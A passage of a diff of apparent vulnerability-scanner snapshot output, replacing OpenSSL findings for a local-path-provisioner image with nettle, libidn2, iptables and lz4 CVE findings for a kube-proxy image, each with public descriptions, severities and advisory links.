"https://www.cve.org/CVERecord?id=CVE-2020-1971", - "https://www.debian.org/security/2020/dsa-4807", - "https://www.openssl.org/news/secadv/20201208.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2020-11", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: EDIPARTYNAME NULL pointer de-reference", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1971", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1971", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "value": "https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "value": "https://www.debian.org/security/2021/dsa-4933", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libhogweed4", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202012-13", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4662-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://www.debian.org/security/2020/dsa-4807", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20201208.txt", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-11", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4990-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23841", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-12290", + "installedVersion": "2.0.5-1+deb10u1", + "packageName": "libidn2-0", "references": [ - "http://seclists.org/fulldisclosure/2021/May/67", - "http://seclists.org/fulldisclosure/2021/May/68", - "http://seclists.org/fulldisclosure/2021/May/70", - "https://access.redhat.com/security/cve/CVE-2021-23841", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-84rm-qf37-fgc2", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://linux.oracle.com/cve/CVE-2021-23841.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", - "https://rustsec.org/advisories/RUSTSEC-2021-0058", - "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://support.apple.com/kb/HT212528", - "https://support.apple.com/kb/HT212529", - "https://support.apple.com/kb/HT212534", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23841", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "https://gitlab.com/libidn/libidn2/merge_requests/71", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "https://security.gentoo.org/glsa/202003-63", + "https://ubuntu.com/security/notices/USN-4168-1", + "https://usn.ubuntu.com/4168-1/", ], }, "category": "Vulnerability", - "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", + "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2019-12290", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/67", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/68", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/70", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23841", + "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202003-63", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4168-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4168-1/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212528", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212529", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT212534", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3449", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "1.8.3-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3520", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3449", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", - "https://github.com/advisories/GHSA-83mx-573x-5rw9", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3449.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0055", - "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - 